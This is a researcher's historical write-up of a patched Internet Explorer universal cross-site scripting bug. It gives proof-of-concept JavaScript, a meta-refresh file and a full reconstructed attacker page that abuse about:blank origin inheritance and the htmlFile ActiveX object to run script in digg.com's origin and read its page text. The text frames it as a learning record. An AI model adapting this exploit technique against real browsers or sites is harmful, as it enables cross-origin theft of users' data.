A streamlined variant of the htmlFile about:blank UXSS — no new windows or server redirects needed. The sequence: load the target site in an iFrame, navigate the target's own nested iFrame to about:blank via a meta-refresh (in IE the resulting blank page inherited the parent iFrame's origin), then use a link created inside an htmlFile ActiveX object, targeted at that nested iFrame's name, to run a javascript: URL in the target's context.

function main()
{
	// window[0] is the outer iFrame holding the target site; window[0][0] is the
	// target's own nested iFrame. Setting location cross-origin is permitted.
	window[0][0].location = "metarefresh.html"; // nested iFrame → about:blank with target origin
	setTimeout('accessiFrame()', 1000);        // wait for the 1-second meta-refresh to land
}

function accessiFrame()
{
	// htmlFile: legacy IE ActiveX control exposing a detached HTML document
	var ax = new ActiveXObject("htmlFile");
	ax.parentWindow.setTimeout(
		// the link targets the nested iFrame by name; clicking it runs the javascript: URL there
		'document.write("<a target=\'session_iframe\' id=\'lnk\' href=\'javascript:alert(parent.document.body.innerText)\'>G</a><script>document.all.lnk.click();<\/script>");document.close()'
	);
}

metarefresh.html:

<meta http-equiv="refresh" content="1;url=about:blank">

The outer iFrame loaded digg.com. digg.com contained its own inner iFrame (session_iframe). Navigating that inner iFrame to metarefresh.html caused it to land on about:blank — but because the meta-refresh came from the digg.com context, the blank page inherited digg.com’s origin. The htmlFile ActiveX then created a link targeting session_iframe by name, with a javascript: href. Clicking the link programmatically ran the script inside digg.com’s origin, reading parent.document.body.innerText — Digg’s full page text.
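For readers reconstructing the frame tree, here is a complete attacker page assembled from the fragments above. It is an added example, not the original proof-of-concept file, and it assumes the outer page is served from an attacker-controlled origin, that the target page contains a child iFrame named session_iframe (as digg.com did at the time), and that metarefresh.html is the one-line file shown above sitting beside it; the target URL, iFrame size and the 1-second timer are assumptions carried over from the fragments. The htmlFile ActiveX object and the about:blank origin inheritance it relied on existed only in legacy Internet Explorer, so this page does nothing in a current browser.

```html
<!-- attacker.html: reconstructed harness for the htmlFile about:blank UXSS
     (added example; hostnames, sizes and timers are assumptions) -->
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script>
// Frame tree once the page has loaded:
//   window        attacker origin (this page)
//   window[0]     iframe "target" -> https://digg.com/  (assumed target URL)
//   window[0][0]  digg.com's own child iframe named "session_iframe"
//
// window[0][0] is navigated to metarefresh.html, whose meta-refresh sends it to
// about:blank; legacy IE gave that blank page the origin of its parent frame.
function main() {
  // Cross-origin frame navigation is allowed even though reading
  // window[0][0].document would be blocked by the same-origin policy.
  window[0][0].location = "metarefresh.html";
  // Assumed delay: long enough for the 1-second meta-refresh to land on about:blank.
  setTimeout(accessiFrame, 1000);
}

function accessiFrame() {
  // htmlFile is a legacy IE-only ActiveX control exposing a detached HTML document.
  var ax = new ActiveXObject("htmlFile");
  // Write a link into that detached document that targets the nested iframe by name
  // with a javascript: href, then click it; the URL runs in the frame's (inherited) origin.
  ax.parentWindow.setTimeout(
    'document.write("<a target=\'session_iframe\' id=\'lnk\' ' +
    'href=\'javascript:alert(parent.document.body.innerText)\'>G</a>' +
    '<script>document.all.lnk.click();<\/script>");document.close()'
  );
}
</script>
</head>
<!-- body onload fires only after the outer iframe (and its nested iframe) have loaded -->
<body onload="main()">
<!-- Outer iframe loads the target site; URL and size are assumed. -->
<iframe name="target" src="https://digg.com/" width="800" height="600"></iframe>
</body>
</html>
```

Served from the attacker origin, the outer page never reads anything from the digg.com frame itself: the only cross-origin operations are navigating a frame and targeting it by name, which the browser permitted, and the origin confusion happens entirely inside the about:blank frame that legacy IE handed the parent's origin.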

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.